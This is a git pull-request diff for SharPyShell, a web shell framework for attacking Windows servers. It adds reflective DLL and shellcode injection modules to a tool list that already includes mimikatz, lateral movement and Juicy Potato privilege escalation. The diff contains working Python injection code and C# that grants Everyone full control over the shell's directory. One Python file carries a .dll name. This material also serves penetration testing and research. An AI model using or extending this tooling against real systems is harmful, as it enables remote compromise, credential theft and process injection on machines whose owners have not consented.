Merge pull request #3 from antonioCoco/dev

Upgrade to version 1.1: 3 Injection modules added + bugfixes

Author: antonioCoco

README.md

@@ -95,20 +95,23 @@ Generated with asciiflow.com
 ## Modules
 
 ```
- #download              Download a file from the server                                       
- #exec_cmd              Run a cmd.exe /c command on the server                                
- #exec_ps               Run a powershell.exe -nop -noni -enc 'base64command' on the server    
- #invoke_ps_module      Run a ps1 script on the target server                                 
- #invoke_ps_module_as   Run a ps1 script on the target server as a specific user              
- #lateral_psexec        Run psexec binary to move laterally                                   
- #lateral_wmi           Run builtin WMI command to move laterally                             
- #mimikatz              Run an offline version of mimikatz directly in memory                 
- #net_portscan          Run a port scan using regular sockets, based (pretty) loosely on nmap 
- #privesc_juicy_potato  Launch Juicy Potato attack trying to impersonate NT AUTHORITY\SYSTEM  
- #privesc_powerup       Run Powerup module to assess all misconfiguration for privesc         
- #runas                 Run a cmd.exe /c command spawning a new process as a specific user    
- #runas_ps              Run a powershell.exe -enc spawning a new process as a specific user   
- #upload                Upload a file to the server   
+ #download               Download a file from the server                                            
+ #exec_cmd               Run a cmd.exe /c command on the server                                     
+ #exec_ps                Run a powershell.exe -nop -noni -enc 'base64command' on the server         
+ #inject_dll_reflective  Inject a reflective DLL in a new (or existing) process                     
+ #inject_dll_srdi        Inject a generic DLL in a new (or existing) process                        
+ #inject_shellcode       Inject shellcode in a new (or existing) process                            
+ #invoke_ps_module       Run a ps1 script on the target server                                      
+ #invoke_ps_module_as    Run a ps1 script on the target server as a specific user                   
+ #lateral_psexec         Run psexec binary to move laterally                                        
+ #lateral_wmi            Run builtin WMI command to move laterally                                  
+ #mimikatz               Run an offline version of mimikatz directly in memory                      
+ #net_portscan           Run a port scan using regular sockets, based (pretty) loosely on nmap      
+ #privesc_juicy_potato   Launch InMem Juicy Potato attack trying to impersonate NT AUTHORITY\SYSTEM 
+ #privesc_powerup        Run Powerup module to assess all misconfiguration for privesc              
+ #runas                  Run a cmd.exe /c command spawning a new process as a specific user         
+ #runas_ps               Run a powershell.exe -enc spawning a new process as a specific user        
+ #upload                 Upload a file to the server 
 ```
 
 ## Windows version tested

core/Environment.py

@@ -11,7 +11,7 @@ class GetTempDirectoryException(ModuleException):
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell
                 {                    
-                    string GetTempDirectory()
+                    private string GetTempDirectory()
                     {
                         string tempDirectory="";
                         string osTempDirectory = Environment.GetEnvironmentVariable("SYSTEMROOT") + "\\" + "Temp";
@@ -47,9 +47,11 @@ class GetEnvDirectoryException(ModuleException):
 
     _runtime_code = ur"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
+                using System.Security.AccessControl;using System.Security.Principal;
+                
                 public class SharPyShell
                 {                    
-                    string GetEnvDirectory(string randomName)
+                    private string GetEnvDirectory(string randomName)
                     {
                         string envDirectory="";
                         string osTempDirectory = Environment.GetEnvironmentVariable("SYSTEMROOT") + "\\" + "Temp" + "\\" + randomName;
@@ -66,6 +68,12 @@ class GetEnvDirectoryException(ModuleException):
                             catch{
                                 envDirectory = @"C:\Windows\Temp";
                             }
+                        } 
+                        if(envDirectory != @"C:\Windows\Temp"){
+                            DirectoryInfo dInfo = new DirectoryInfo(envDirectory);
+                            DirectorySecurity dSecurity = dInfo.GetAccessControl();
+                            dSecurity.AddAccessRule(new FileSystemAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), FileSystemRights.FullControl, InheritanceFlags.ObjectInherit | InheritanceFlags.ContainerInherit, PropagationFlags.NoPropagateInherit, AccessControlType.Allow));
+                            dInfo.SetAccessControl(dSecurity);
                         }
                         return envDirectory;
                     }
@@ -97,7 +105,7 @@ class ClearDirectoriesException(ModuleException):
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell
                 {                    
-                    string ClearDirectories(string[] modulesPath, string envDirectory)
+                    private string ClearDirectories(string[] modulesPath, string envDirectory)
                     {
                         string output="";
                         for(int i = 0 ; i < modulesPath.Length ; i++)

core/config.py

@@ -1,7 +1,7 @@
 import sys
 import os
 
-sharpyshell_version='1.0'
+sharpyshell_version='1.1.14'
 
 header = '#SharPyShell v' + sharpyshell_version + ' - @splinter_code'
 banner = """

modules/dll/messagebox_msf.dll

@@ -0,0 +1,76 @@
+from modules.inject_shellcode import Inject_shellcode, ModuleException
+from core import config
+from utils import gzip_utils
+import pefile
+
+
+class InjectDllReflectiveModuleException(ModuleException):
+    pass
+
+
+class Inject_dll_reflective(Inject_shellcode):
+    _exception_class = InjectDllReflectiveModuleException
+    short_help = "Inject a reflective DLL in a new (or existing) process"
+    complete_help = r"""
+        Author:     @stephenfewer
+        Links:      https://github.com/stephenfewer/ReflectiveDLLInjection
+              
+              
+        Inject a reflective DLL into a remote process.
+        You can choose to create a new process or use a pid of an existing process as a host process.
+        The dll_path is a relative path to a dll that exists in the folder 'reflective_dll/'.
+        The dll must be compiled with the 'ReflectiveLoader' exported function otherwise it cannot be executed
+        at runtime.
+        You can use one of the following supported injection techniques:
+            - remote_virtual:           classic injection:
+                                        VirtualAllocEx (RWX) -> WriteProcessMemory -> CreateRemoteThread
+            - remote_virtual_protect:   with this technique you never allocate RWX memory (polymorphic encoders won't work):
+                                        VirtualAllocEx(RW) -> WriteProcessMemory -> VirtualProtect(RX) -> CreateRemoteThread
+        Note that when you try to inject into an existing process you should ensure you have the rights to open
+        a handle to that process otherwise the injection cannot be performed.
+        
+        
+        Usage:
+            #inject_dll_reflective dll_path [injection_type] [remote_process]
+        
+        Positional arguments:
+            dll_path                    name of a .dll module in the 'reflective_dll/' directory
+                                        the DLL must contain a ReflectiveLoader exported function
+            injection_type              the process injection method to use for injecting shellcode
+                                        Allowed values: 'remote_virtual', 'remote_virtual_protect'
+                                        Default: 'remote_virtual'
+            remote_process              path to an executable to spawn as a host process for the shellcode
+                                        if you pass a pid it will try to inject into an existing running process
+                                        Default: 'cmd.exe'
+
+        Examples:
+            Inject a messagebox reflective DLL into an existing process:
+                #inject_dll_reflective messagebox_reflective.dll remote_virtual 2264
+                                             
+    """
+
+    def __get_reflective_loader_offset(self, dll_path):
+        pe_parser = pefile.PE(dll_path)
+        for exported_function in pe_parser.DIRECTORY_ENTRY_EXPORT.symbols:
+            if 'ReflectiveLoader' in exported_function.name:
+                reflective_loader_rva = exported_function.address
+                return hex(pe_parser.get_offset_from_rva(reflective_loader_rva))
+        raise self._exception_class('The DLL does not contain a reflective loader function.\n')
+
+    def _create_request(self, args):
+        dll_path, injection_type, remote_process,\
+            thread_timeout, thread_parameters, code_offset = self._parse_run_args(args)
+        dll_path = config.modules_paths + 'reflective_dll/' + dll_path
+        code_offset = str(self.__get_reflective_loader_offset(dll_path))
+        with open(dll_path, 'rb') as file_handle:
+            byte_arr = bytearray(file_handle.read())
+        base64_compressed_dll = gzip_utils.get_compressed_base64_from_binary(byte_arr)
+        if injection_type == 'remote_virtual_protect':
+            runtime_code = self._runtime_code % (self._runtime_code_virtual_protect, base64_compressed_dll,
+                                                 thread_parameters, remote_process,
+                                                 thread_timeout, code_offset)
+        else:
+            runtime_code = self._runtime_code % (self._runtime_code_virtual, base64_compressed_dll,
+                                                 thread_parameters, remote_process,
+                                                 thread_timeout, code_offset)
+        return runtime_code